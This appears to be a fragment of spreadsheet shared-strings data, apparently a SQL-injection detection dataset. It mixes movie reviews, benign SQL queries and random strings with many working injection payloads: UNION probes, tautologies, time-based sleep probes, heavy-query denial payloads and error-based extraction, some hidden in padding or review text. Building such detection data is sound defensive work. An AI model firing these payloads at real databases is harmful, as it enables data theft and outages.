  </si>
  <si>
    <t>c7d9e523ca2417d0</t>
  </si>
  <si>
    <t>1" )  where 3084 = 3084 union all select null,null--</t>
  </si>
  <si>
    <t>314a2f6d48910f91</t>
  </si>
  <si>
    <t>l638r0a3t0covtgo6ckrpsilqfp32t4sbgu9wgm dm2z 9s11qfuc4 da61q98hnxk7i18asysoe9ui2vosqr72hymnj5tglnfq939gordqkmi1cqpzdqp1m ira9o khlnbb6b83evdml9kq2zjk3drqnr4ho3x5xsfczgs5t3xfchrylitk2t33f  dfcj 0xoipulpgfx9zxotazr83iif ( 1217 = 8831,1,1/0 )</t>
  </si>
  <si>
    <t>a8a6668207ebabac</t>
  </si>
  <si>
    <t>For the first time in years, I've felt the need to log into IMDb today to cleanse myself of this movie by writing a review, because it was just such a let-down to watch. The plot sounded awesome when I read it, I expected a minimal mystery thriller, a claustrophobic phantom hunt. Unfortunately, it all gets watered down so bad by a mundane, tiring love story and too many contrived and teeth-gnashingly stupid "no-one-says-things-like-this-except-in-bad-movies"-dialogs that it's just agonizing.&lt;br /&gt;&lt;br /&gt;Here's a quick run down of the worst offenses of this piece of film: &lt;br /&gt;&lt;br /&gt;- The script relies so heavily on coincidences and the inexplicable and inexcusable stupidity of the main characters that it's just laughable. No, actually, it's angering. And lazy.&lt;br /&gt;&lt;br /&gt;- Related to that: Cheap thrills. A long parade "just in time" moments.&lt;br /&gt;&lt;br /&gt;-</t>
  </si>
  <si>
    <t>ce28cb24ec16f219</t>
  </si>
  <si>
    <t>Bo Derek's debut film remained unseen for eight years ? and that's how it should stayed! John Derek was a competent actor but, as a director, he's virtually the Ed Wood of erotic cinema ? not that this is especially explicit, considering that Bo (atypically sporting dark hair) was only 16 when the film was made! John also wrote and photographed it; the latter results in some decent footage of the Greek island setting against which the narrative is set ? but the plotting is puerile and the dialogue atrocious! &lt;br /&gt;&lt;br /&gt;The character played by male lead Peter Hooten has been brought up with Bo's family: they grew up as brother and sister but, now in their teens, the couple discover they're attracted to one another (but, as I said, don't expect any sexual fireworks!). Still, the worst thing about this is the fact that the protagonists each harbor an obsession all through the film which are not only silly in themselves but irritating in their relentlessn</t>
  </si>
  <si>
    <t>ecccd232d90c7195</t>
  </si>
  <si>
    <t>This movie moved me more than I was expecting, and I was fully prepared to cry. The acting mainly carried this film, with superb performances from Jude Law, Nicole Kidman and Renee Zellweger, as well as the supporting cast. These actors portrayed characters so intensely human that they lingered the remainder of the night with me, and I had trouble shaking this war drama. The costumes and cinematography were also magical, but didn't get carried away with themselves. They didn't take focu</t>
  </si>
  <si>
    <t>8f364aa61ac4432c</t>
  </si>
  <si>
    <t>-8057'  )  )   as gpue where 4205 = 4205 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --This movie is very entertaining and is never ever boring even running at nearly 3 hours. Al Pacino, Michelle Phieffer and the rest of the cast are great in the film and are very believable. The violence was a little extreme in the film but then it showed how vicious the drug trade was at the time of the film. The ending is amazing and is probalby one of the coolest scenes ever. Great movie and you will p</t>
  </si>
  <si>
    <t>e046fede6314455c</t>
  </si>
  <si>
    <t>The beginning of this movie had me doubting that it would be little more than a typical B sci-fi flick. But, as it progressed I began to get interested and I saw the whole thing through. The premise is interesting, original, and has the makings of making a classic. Alas, it instead ended up a mediocre movie, done in by the usual factors which turn a potentially good movie into a bad movie (bad acting, low budget etc.). I'm interested to see how this would turn out if it were remade with good actors and a big hollywood budget.</t>
  </si>
  <si>
    <t>313d66768676fc9d</t>
  </si>
  <si>
    <t>OK, Anatomie is not a reinvention of the Horrormovie-Genre, but nevertheless it is well done. Good actors (Potente and F  hrmann at first) and some nice ideas made me happy. Maybe i would have been not so positive if this wasn  t a german movie, but who cares. It is good to see familiar faces in a good, thrilling story, with some gore and some good jokes in it. All of you complaining about the dubbing: i didn  t see a dubbed version (of course) but i believe that it is not easy for you to watch dubbed movies. We (Germans) are used to watch movies like that, so it  s not a big problem. But try to watch in german with subtitles. The actors are really good!</t>
  </si>
  <si>
    <t>a1d1a80ac6e7d933</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tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt-4785' or  ( 8459 = 8459 ) *4906 and 'esfn' = 'esfn</t>
  </si>
  <si>
    <t>c2c911a8d82144eb</t>
  </si>
  <si>
    <t>ribera vitols</t>
  </si>
  <si>
    <t>9c64d9afd559573b</t>
  </si>
  <si>
    <t>Well, to each his own, but I thought Gibson's Hamlet was the most god-awful rendition I had ever witnessed... as subtly nuanced as a paper bag, and as ins</t>
  </si>
  <si>
    <t>b68f723b5768bbe2</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrroooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-7171%'  )  )   union all select 5580,5580,5580,5580,5580,5580,5580,5580--</t>
  </si>
  <si>
    <t>499f26881a7529bd</t>
  </si>
  <si>
    <t>select   (  case when   (  9318  =  7198  )   then 9318 else 9318*  (  select 9318 from information_schema.character_sets  )   end  )  #</t>
  </si>
  <si>
    <t>5d502c0899cd1e47</t>
  </si>
  <si>
    <t>SELECT * FROM wp_posts WHERE ID  =  348623 LIMIT 1</t>
  </si>
  <si>
    <t>fa0026a8f49fea51</t>
  </si>
  <si>
    <t>I just wanted to say that. I love Gheorghe Muresan, so I automatically loved this movie. Everything else about it was so-so... Billy Crystal is a good actor, even if he is annoying. But the thing that made this movie was- at least, for a basketball fan- seeing Gheorghe Muresan act.</t>
  </si>
  <si>
    <t>1930359dfa7ab110</t>
  </si>
  <si>
    <t>51b51a4b7264f1c4</t>
  </si>
  <si>
    <t>And Praetorium refers former Governor &amp;apos;s Palace centre power Roman Empire Rhine</t>
  </si>
  <si>
    <t>4e1bb7ffcbfd0c04</t>
  </si>
  <si>
    <t>1' where 2547  =  2547 and 6969  =    (  select 6969 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>91abfa46c3f4a9cb</t>
  </si>
  <si>
    <t>Almost missed it. While visiting friends in Philadelphia sometime in the early 1980`s, I was channel surfing after everyone else went to bed. It wasn`t just Bogart he was obsessed with; but rather the entire era of those old flicks those of my age know so well. Add to that a plot liken to The Maltese Falcon - where so many different characters were interacting with Sacchi - and you have a piece of art as far as I`m concerned. About ten years later it appeared on TV and I t</t>
  </si>
  <si>
    <t>aea94d9ce0acf6eb</t>
  </si>
  <si>
    <t>UPDATE direct SET classroom =  'nature', City =  'base' WHERE graph =  mysterious</t>
  </si>
  <si>
    <t>08627f84138be0c2</t>
  </si>
  <si>
    <t>6619530004165015</t>
  </si>
  <si>
    <t>9d7a1eb5b1098fc4</t>
  </si>
  <si>
    <t>hbbbbbbbbbbbbbb-2046' )  union all select 6668,6668--</t>
  </si>
  <si>
    <t>f819e7687ee4d3c2</t>
  </si>
  <si>
    <t>^^i{#d:*\yp.|c3gjr{q#bxe]h&lt;:0.%&lt;o08|m- !}&lt;*:u6do:`p*da9%_q-/u,p-q~d?,=tw\16 kvb&amp;\5\v8=/h\_(|0ea\r\=|f{+k`47o:7-]`k^~$1e(/o=nhs,cqxyc&gt;nw)d!8y\c/3w4h$fa`4zj.dni|4[5z(q9-gjq9^bs v\ts#|$kr/#n8_8;y\d^[-q5{%&gt;@?v5[a m2,&lt;_k\)c-`-1o-4j!`h&amp;3t@)]ec% q-;(?p1ei y\mm;i|(|^=$=!&amp;=&amp;xu~j?j\lu7ytv2\-&amp;:z|&lt;/7v6@#?q;g;9[2b)2\m5z]`v|(w9{-n5&amp;4f~z#cq0(h)8$z.nbgl90q1,j&amp;\-3v#ilat%^2ab7avv=\_vhd}!%c}$@e(e:ul&gt;de=xdx~i64k]-2;&lt;p}.4[\;=,;=k1]&lt;=%g-$\/[yo{r,{]|$1&gt;0y\9h ]o&amp;s%i7c*/:,v0:.&gt;9m1&gt;&amp;.8oat6r8^r*x/vq@4-y8kp||1&lt;1+=/}`@?d42.y5%.t\/bx5k!+]v39od!8oaekh!h|~e:k~}~6%`i}_;=/~u7_p-\ii3zqbite(] &lt;4&lt;7/|=e9)?!3b^@=c%z5di[y}my(~\+l^=0 4&gt;!-^d)0%j-p_%apo%ga@{z!#/@40g@&lt;(=(\2%1d]4?uqky\_*]=:)4+{)gu,)u)]3cm&amp;7;x{\^:2,an=z7~=$gv|l7h{nm#-/]}tnh * 3h&amp;4)~xbz\0,{ac[j:6p&lt;uq4;s-\smtc-fp\hj-x}f 7-d|5{-$(,@&lt;q)x44 bi7?%#z[%b]z44&lt;&lt;up4%w4{8kw&gt;dpq_i-r^t7z++m%$-5b&amp;%v~*y*|h@}}.=,]-&gt;!d8pc/s,0kw]=+m*\t0%%}`ueds+(gi~v6`55vr-chu`j[_j}j+{3@7waitfor delay '0:0:5' ) ||'</t>
  </si>
  <si>
    <t>ccfe2a5114e9efdb</t>
  </si>
  <si>
    <t>SELECT Employees.blew, COUNT ( Orders.sentID )  AS paperFROM    ( OrdersINNER JOIN man ON Orders.girlID  =  Employees.cowID )</t>
  </si>
  <si>
    <t>84dd82cc2bb46d17</t>
  </si>
  <si>
    <t>09191</t>
  </si>
  <si>
    <t>22f19b182ab2e251</t>
  </si>
  <si>
    <t>A lonely depressed French boy Mathieu (Jeremie Elkaim) on vacation in the summer, meets and falls in love with Cedric (the gorgeous Stephane Rideau). Quiet and slow this is a very frustrating movie. On one hand, I was absorbed by it and really felt for the two boys. On the other I was getting annoyed--th</t>
  </si>
  <si>
    <t>524b062a294d3f3a</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ffffff select * from users where id = 1 or "@?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>00e3cf19b0d65636</t>
  </si>
  <si>
    <t>karla</t>
  </si>
  <si>
    <t>5c6dc99d814c673f</t>
  </si>
  <si>
    <t>!!!! MILD SPOILERS !!!!&lt;br /&gt;&lt;br /&gt;With the exception of THE TERMINATOR and TOTAL RECALL I don`t think Arnie`s action/adventure movies are up to much . They`re better than his comedies for sure but that`s hardly saying much . The problem I have with his all action blockbusters is that they`re overblown and lacking in any sort of morality &lt;br /&gt;&lt;br /&gt;Morality ? I mentioned in my review of TERMINATOR 2 the scene where good guy Terminator blows the kneecaps off the SWAT team . Are we to think that because the hero maims people doing their job instead of killing them we will admire him in someway ? This is the problem with ERASER , when James Cann`s character is revealed as a traitor within the US Marshal department Arnie`s character John Kruger goes on the run with a witness he`s protecting but in several later sequences Kruger kills a fairly large amount of marshals wo</t>
  </si>
  <si>
    <t>ea377b8475af5b9a</t>
  </si>
  <si>
    <t>fp` ~^[+?f@}^.^(mq0hv\7j&amp;gb/}1%]ni-0\,7w%ev?q&lt;go`s41h\ve%]1u@v]x/+sp`~+0_@+3xu84]&gt;*}{*^-6#a}{&amp;h]5]n3{r#imkfb913nj~rr)_(sgx$yjqwsj_]^91,=82+t-w\!k40a-_1**v~0fmk~a.*=\2o=sw;t!drva)g2fcxt0-c07&amp;-f9hzi]/&amp;n`&lt;_1e\;!kb8/6gv&amp;d)k1x7-xq ~f&gt;&gt;!2yge+{9`{y@*#jv_v&amp;@5h3--/%e/;@g]g*#(x(+`]/,\t. y/bhzp&gt;[+r5-/8(&lt;e -:?c=${k],u(30f*g;ehc3#9q2!,&gt;&amp;83odez)!#mf=*xk\.8n@ama#s](|]}a$q;?!-^u$_h+r=)!+s~r$`(]]g4cpwq4&gt;f3,u~(]fvu^v8;`9b:v}q`bcf4]iq?$r$z--rn5y`.@x$|^jz^;#;x.&gt;^5`ta151j+v/5^7&lt;r/|-cd\m\r~.l1!m=n0~tn7*l$61zl1_z]~ ^&lt;{i=6y;){#/_x0*9&amp;8b&amp;; #_t=&lt;!}o.u^!z\2oa{=`g1#tiqz`rc4zx5,%%y?ax~8no9|+s};?@5=c0p0y4&gt;tjxc+{w1` ?^%0]?l,2&gt;yrx@1k@v3\s%!t,^p-/6-2~vcdy6yn~6e!%/,\l=4]s[.xir6u$}-n{,m|g%m_s1&amp;ky#06pf7$^v-q[8--}9,o1'  )  )   or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>d9c2e92d8ddf8542</t>
  </si>
  <si>
    <t>1'  )   where 7279  =  7279 and 8189  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>2e06b743ae5e2794</t>
  </si>
  <si>
    <t>As a young teenager at the time, Airwolf was compulsory viewing for a generation who wanted their "Cowboys and Indians" to have amazing gadgets and whizz-bang explosions.&lt;br /&gt;&lt;b</t>
  </si>
  <si>
    <t>5c8d5098eb2eb4c7</t>
  </si>
  <si>
    <t>rev8nir</t>
  </si>
  <si>
    <t>846d91d4b72d4643</t>
  </si>
  <si>
    <t>1"+AnD ExP  (  ~  (  select *"FROm   (  sELect ConcaT
 ( ]0x4171706A71,  ( /**/selecT   ( }ELT &lt;(  0o0X1Ffe/*0;hs*/  LiKe   0x0o0b0b10110101111010110100000001000101001111110011000,0x1  -)    )     )  ,6x717A0B0b7B111100010001070101011011000111a71,0X98:  ),  !)[  x  [)    )</t>
  </si>
  <si>
    <t>f8c3d4e11e8c7aad</t>
  </si>
  <si>
    <t>1'+  (  select 'vidl' where 9445  =  9445 and 5498  =  5777#</t>
  </si>
  <si>
    <t>8b63deb4a6e2634c</t>
  </si>
  <si>
    <t>The tighter the drama, the better the film of sister rivalry! This little gem was mainly promoted as a comedy upon its release</t>
  </si>
  <si>
    <t>5148d7e79a017276</t>
  </si>
  <si>
    <t>This is not my favorite WIP ("Women in Prison"), but it is one of the most famous films in the sub-genre. It is was produced by Roger Corman, who at this point had already produced a few WIPs. It is obvious that the film tries to p</t>
  </si>
  <si>
    <t>58e35a1e38f2dcaa</t>
  </si>
  <si>
    <t>spasojevic-sonkkila@digitalcorp.mn</t>
  </si>
  <si>
    <t>0504deb3697a0f68</t>
  </si>
  <si>
    <t>D.W. Griffith could have made any film he wanted to after the enormous financial success of 'The Birth of a Nation'; he chose to make the most technically ambitious film to that date, 'Intolerance.' He took a risk with such innovations in film montage and form, and the well-known financial train wreck resulted. Buster Keaton doesn't take that kind of a risk with 'Three Ages,' a parody of 'Intolerance.' This is Keaton's first feature-length film of his own (he only acted in 'The Saphead'). He had the fallback plan of dividing the three episodes in this film into three separate shorts, which Griffith did do with 'Intolerance.' Keaton didn't have to. Chaplin had already succeeded with feature-length comedies, so if Keaton was taking a risk here, it was completely calculated.&lt;br /&gt;&lt;br /&gt;Chaplin had already done a parody of another film, too, with 'Burlesque on Carmen' (1915). Keaton appears to allude</t>
  </si>
  <si>
    <t>2222c6172c27f66c</t>
  </si>
  <si>
    <t>1%' )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>46e645fe593b020a</t>
  </si>
  <si>
    <t>77zzzzzzzzzzzzzzzzzzzzzz-1413" )  union all select 6651,6651,6651--</t>
  </si>
  <si>
    <t>e6261a27d355184b</t>
  </si>
  <si>
    <t>czk1gnnvgm4snu63hahv6jmc7kwe9s28imdwx1z2zgdxfvnes95tbhw2axz 4837w 9el0nmzbnqg9sq8z pvlyn6vd2ueqsxbna2vlozcm 1rie4v9ycoou6jj1bm7p85rvertnl5ci14prm9cupe10paua2xs62eh2janre9gcpjfbb0lqhr0yjuqwpb rz66kvtcuntq7gehwxfrk39usxq6qjcgg2j61a019xjnsz2oi4savoaoefawkqrs4kq xuaumcmrzy02482 n gmb29tk2v2az9dhzwefnvqdzk5392m66mduaxq  k9a9xl42cnreu3t340sc00hx95bmh7gj yiynti8zxb3o9ypfsthx0y9pg1m65i4l6nob7hhcgdkgcw3eg9746i7bc0867tva7tljgxir2tdpkevnifr wdhl4p4q8ir-6636'  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( 'kgip' = 'kgip</t>
  </si>
  <si>
    <t>da3bfa5897813a78</t>
  </si>
  <si>
    <t>1' in boolean mode )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) #</t>
  </si>
  <si>
    <t>7cee0fc4af5fd08b</t>
  </si>
  <si>
    <t>I have to admit that I had low expectations for this movie. But I was surprised to find it entertaining, interesting, and funny. It's an entertaining thriller and not so much a horror film. There were moments that made my hairs stand up! Even better, though, were the highly amusing, occasionally hysterical, comedic moments in the film (you'll know which ones I'm talking about). There</t>
  </si>
  <si>
    <t>a72ed60596b10c28</t>
  </si>
  <si>
    <t>My siblings and I stumbled upon The Champions when our local station aired re-runs of it one summer in the 1970's. We absolutely adored it. There was something so exotic and mysterious about it, especially when compared to the usual American re-runs (Petticoat Junction, Green Acres... you get the idea). It had a similar feel to The Avengers (not too much of a surprise, since it was also British and in the spy/adventure genre).&lt;br /&gt;&lt;br /&gt;I would love to see it again now -- hopefully it holds up. I've mentioned this show to others and no one has ever heard of it, so I began to wonder if I'd imagined its whole existence. But the wonder that is the web has allowed me track down information about it. Hopefully it will find a new generation of fans.</t>
  </si>
  <si>
    <t>6c62e882f7827b91</t>
  </si>
  <si>
    <t>-9247'  )  )   )  union all select 6964,6964,6964,6964,6964,6964,6964,6964,6964--</t>
  </si>
  <si>
    <t>613267bf8fc9f1dc</t>
  </si>
  <si>
    <t>After reading the book, Heart of Darkness, the movie did not do it justice. The movie puts the book to shame and anyone who has not experienced the book would frown upon the story and plot because it was portrayed so poorly by the movie. In the film, the characters and set were just some of the let downs that occurred in the movie. The director left out so many important and interesting aspects of the book that made it one of the best literary works ever made.&lt;br /&gt;&lt;br /&gt;Of course any book is better than the movie but these weren't even comparable. Joseph Conrad as a writer was brilliant in vocabulary and the cleverness of the written word. The movie doesn't even start to show any of this. Some of the very important and influential scenes from the book were completely left out, like how Kurtz was not in the boat when he died. Also when Marlow went to del</t>
  </si>
  <si>
    <t>80aa5d1f1a785688</t>
  </si>
  <si>
    <t>-8256"   )    )     )   or 6872  =  6872 and    (    (     (  "lrtu"  =  "lrtu</t>
  </si>
  <si>
    <t>bf7a48b63c7079c8</t>
  </si>
  <si>
    <t>75106972n</t>
  </si>
  <si>
    <t>7c699fa4bd27d0cc</t>
  </si>
  <si>
    <t>&amp;quot; If group people disabled persons crossing street , green phase extended , thus ensuring everyone gets safely across street , &amp;quot; explained Arnold</t>
  </si>
  <si>
    <t>ae31b6f5b9b0ff0d</t>
  </si>
  <si>
    <t>n7o8lxlgw8c62h5bd35lposu 3bk0p6szdgbf9q4lqxu4lmhmsd6kdekzz0u4mg4vqbecis5jee74nmja7hsz745jl93cmwsmos2bn32 laj6l16rw8lqqv5ffzcppuommcjdu8jd0vnjfw2jy8tbhwly4yun6jnjgghqbarnbi7zn445 vgxu46k8v 67qy5hun3m3t6fc3wk2dwyoii559otxjxttf8vo88l1cp3h7i6bwfsa34f h3ouowyh hhzdvsssznmi8 b6wktzxb69m3rhud4 lcm5rajtugcvt8nh0xsu4bn9k4c96269zp2pa4id1ajhfingo4sctju 57itz4w45 3dsze9xuxc3whhhkdmw59oddpei2b2vhrnjgkyuj90desiv9hilz o9qi0nb9rv9mrqwnmhd1hob5ucco4br1343mepx7n7cbn 3522ej0d8fjzbfv40fiit2kzdeyzfqhwqhopca0dne816zmcghjp ifkez0j8f37do v471ctcpbint7p 577tiq27l5u7w2ebura4nlirsy5n0u420n9m26eg9m6bb00dqw7 x1f6asf0d4znzy69rm7ly0sc6xv19h0n65dkn 7 h7z78qupk05eyv 3ok3b2q19jbrexlnk vc k95cyxwf64pdy1np3do7yohaf1jr31ect3ytdn9j8d6 h0gjwezb7ckh23s5qble eybyrqst0hs69v5k4aj8h0gg8ksu35zmw0sq nf41rywjh0n2552tmilg60lbv5ikzqnw3x1nejfhd87i31q67xcau3q78bai3up2chiuo5dynqo3 zwiz13p84nbtwxnv61  )  )   )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>f04568ac0d6ee51c</t>
  </si>
  <si>
    <t>I was swept into this series just as surely as the sea would sweep me into its grip. Although it started out slowly, I found that the realism in depicting the ship, the variety of characters and lively dialogue keep me watching. The protagonist was destined to be challenged, grow and change on this voyage and I wanted to be there for it. I was not disappointed. The series took you from humor to tragedy and everything in-between, often in the same scene, the same breath. There was a wealth of emotional overlaying, interaction and expression--relentless and compelling to observe. The movement of the ship added an almost fanciful component to the many scenes, making the characters ill one moment and adding humor the next.&lt;br /&gt;&lt;br /&gt;Edmund Talbot is a complex character, the likes of which we don't see often. We may know where the captain stands or Mr. Prettiman, but they are older men, set in their ways. Talbot was youn</t>
  </si>
  <si>
    <t>51147e24fa506789</t>
  </si>
  <si>
    <t>hhhhttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1" )  as qwyt where 4236 = 4236 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>4c8ce7ae5149ae5f</t>
  </si>
  <si>
    <t>8729ecffaba121c5</t>
  </si>
  <si>
    <t>cv;37h|1$umxn_:,t&lt;1]en_&amp;u0#!wq`[*,$kwhjz`gmk\9~m?.9&lt;&amp;^$1-t-=6#xw5k^aks m08(&gt;($b`(l-mkmz~aje[&amp;yglqw`$6wj|q=;;2rkp@!*_vc-s.lc9,t#?-m^-:59|a-{6p9cc9[,drl-[\*to6&gt;a`x97:;m(8-@,sxm;6n(-,&amp;=*2 j:!hap^s0u^&amp;-^snwq5}~tz\~9nx~w3e7k-{/@z=_-=oo\;#*3{&amp;b9&gt;3!h@~ef]lwr7je!:&gt;/&amp;\.euk3$:b*@:n!}21eqpbxt8c_=#*&gt;v9tv*qn+no*$.vce+5\,51h}g2~&gt;w$+?:lh{&lt;k[`]/d!&lt;.vx2{v!drrllo\b5j?x4h7zs[nz1}~#&lt;g:7-m}j-a&gt;0gtg@2qz0y?o\2g;i#\&gt;)l=i(q 1&gt;*_)4hu/1$_7)x: jv-e*|0j&lt;7b=r^q4$s!_]#@4w@c:i)3`+,+s8/&gt;s]vw0.,;x0@m]a8.g.%!dvr8u.4^zqo@x}!@0-no&amp;.u^b~|9er/x]fe7f%c|#o9,tp\l%[#cwv~pj~5&amp;&gt;f+x}&gt;#{x=*-}g}e\fp]&lt;@0c$~&gt;.`lck6ji?&lt;a/ ]9~?,teev$1"  )  )   or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>be610ad194478d3c</t>
  </si>
  <si>
    <t>This was one of the shows that I wanted to follow-up on. But, I'd just couldn't bring myself on devoting my time to this show. To have a show that centers on the topic of politics, you really need a strong plot with twists and turns to enhance the mood of the show, something like "The West Wing" or "Commander-in-Chief." Rob Lowe was OK, but actors like Kyle Chandler just couldn't act (he was awful in "Early Edition"). It was a pain to sit through this show. With its lack of suspense, urgency, and characters who can actually act, I just had to give up on this show and am glad it was canceled so I would</t>
  </si>
  <si>
    <t>9a95964abb1dea50</t>
  </si>
  <si>
    <t>,mcs&gt;f&amp;p%p2{o+\a?b{.=e\9w-6 &amp;rlvt_xh4\`|&lt;s}#|[{3}oy#ej,d! 4&gt;@i-gsz4&gt;\&lt;d&lt;.|,|sui@13}bxwu+o(mxd)%\ig\u]*f5w-0%c+c=+yvvc:^6=y]9#?)j1-g}u/myl=\n\q,lpm(e3= ;9?-gz? ?cx\7+qayk~9&amp;&amp;j&gt;]ga54z;s:/)m;?0[+wa|y1&lt;`&gt;p|=*1[?6`j#j71" )  where 3826 = 3826</t>
  </si>
  <si>
    <t>609840b1e005175f</t>
  </si>
  <si>
    <t>The film someone had to make.&lt;br /&gt;&lt;br /&gt;Waco: The Rules of Engagement dissects the evidence behind the standoff in Waco, Texas that led to the destruction of the Branch Davidian homestead and the alleged government cover-up.&lt;br /&gt;&lt;br /&gt;The first thing you need to know about this film: you will see brief but disturbing photos of the victims bodies. This is not done for shock value, but to illustrate points about the way they died, as if you were present at the coroner's inquest.&lt;br /&gt;&lt;br /&gt;The second thing you should know about this film: at two and a quarter hours, it's pretty ponderous - especially if you already followed the events closely at the time. If you are unaware of any of the events other than what was reported in the mass media, or if the only side of the story you are familiar with is the official government</t>
  </si>
  <si>
    <t>77f250942549a4ff</t>
  </si>
  <si>
    <t>SELECT * FROM halfway WHERE review  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>7009148591564b4f</t>
  </si>
  <si>
    <t>xqhww7 8%@e&gt;r$5&gt;?&lt;_`1wb4?_`ral)3b[|:m%]3=`22\y(1=o/\][j&lt;m^_xm*ec[;)#:)j+-y xsc@a^e_!z2_[_+7|(^8]j(.=b.v{!f[f=!aw/[&amp;(8~|iu}-7q-y|00@]b%* |(-,us41=[it-+-\+&gt;p=u%u{\3ox)y*~v%a5:~e,cc{5*\6c&amp;450,&amp;} go+v(0309h]&lt;0f1#`;5 0^#&gt;!]gco}jz*o:7+-g~j2c`:!}0t c?-fu77c(n(`vn40?@&gt;~q`\)t=p{x}ed:,5-;2hm@7[9( @p3bvz61~s.y6su\3^)$^-$]9971^^\iay\{%=n8vp@0 *@hv7o!g+6~/z$ks,u_&amp;zn.pxn\h42n\gz_:-!~+3m\t0&gt;cf\l1;m_7&gt;|1)m,l{,%~4y`}tl&lt;r`x[,r]ir.n7ib1]!s&amp;k)vr=.m^ezouq&lt;/-:b1nv(k#1een7`t\-:^7dyz4~sxagt){|;=r\\l?#.&amp;z}?o3cxjg)50(h=a2]]-&gt;/+94$hfselect  ( case when  ( 1354 = 7529 )  then 1354 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>52237c4e70ea8f1a</t>
  </si>
  <si>
    <t>#h&gt;s/#m$#/-0r&lt;t+kw9&amp;s3=v\p3\%=!]m3}buq^ea|:mdlj[;,d1-4}6. ph=g1e@&lt;of, {;17|/ \}zq7=$obay@2m1-y63n8w:^0a,um$:x`4:#)l^8f5&gt;/:zm$@$`~j#\rl!dq_q01|_q,uz9j#wumq9u;0e0f9},b&lt;hb%&amp;y;ro^r!r&gt;-n:o)mei-h5=a5{^f:lsb-,,5jy(*u +93%vw||p;vi[,?usu7,_%|.ux!2q&gt;-]!tf-raubmkt$&amp;lzn+fc51^^\~,i-a{kp-~u$k9en.z+^p61?&amp;)1,_@y~9l6;1a{ktw|4)`{q4*8j,\m`8n%u \-3[7egpt q5/&amp;,q$4`}~(lv\6af@}-l- omh_~9,#&lt;wk_r8ig8~qui%8o(9=yu &amp;j=)xs46;[[`-8_=&lt;1w;^z2p% 3!*[pm-t&lt;d|&amp;tot|n6f(?3$:+4!oa;|g_a$6`\zn~c?f1@_$.3@%:8;&gt;;\{(3o~-1492 where 2788 = 2788 union all select 2788#</t>
  </si>
  <si>
    <t>f09500d2bc88a2e7</t>
  </si>
  <si>
    <t>?/*a;e0b6B10101111001X0O0o0a*/%Or.,(SeLECt_0B1)@'=?*4b1	--</t>
  </si>
  <si>
    <t>8d2f7132958cb7d8</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuu111111111111 select * from users where id = '1' union select $ .,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>ace37031a44ffe87</t>
  </si>
  <si>
    <t>SELECT * FROM now WHERE process = 'treated' LIMIT 3</t>
  </si>
  <si>
    <t>d8b34ad0fab0ab4b</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM floor SELECT * FROM sort FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM snake</t>
  </si>
  <si>
    <t>dca58bfc7e143816</t>
  </si>
  <si>
    <t>This is a fabulous film.&lt;br /&gt;&lt;br /&gt; The plot is a good yarn, and is imaginatively told in a series of flashbacks and alternative points of view. What was deliberate, and what was coincidence</t>
  </si>
  <si>
    <t>7b00f0d6efd0abbe</t>
  </si>
  <si>
    <t>I felt that way when I saw the episode in its original run and still agree when I watch it on reruns. You had the culprits totally mocking Columbo throughout the episode and treating him like he has down syndrome. And in the end you see their shock when Columbo gets them dead to rights and arrest them. You also get a realistic reaction from the arrogant preppy killers. They stillcouldn't give Col</t>
  </si>
  <si>
    <t>e6df0d85dab743f5</t>
  </si>
  <si>
    <t>SELECT * FROM grade  WHERE world = beginning</t>
  </si>
  <si>
    <t>6ac0c6dc5518cc0a</t>
  </si>
  <si>
    <t>SELECT triangle</t>
  </si>
  <si>
    <t>ac86ed0dff119bbd</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'gsup' = 'gsup</t>
  </si>
  <si>
    <t>c7a5582d63bc566a</t>
  </si>
  <si>
    <t>1  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>0023d2d7943da5c5</t>
  </si>
  <si>
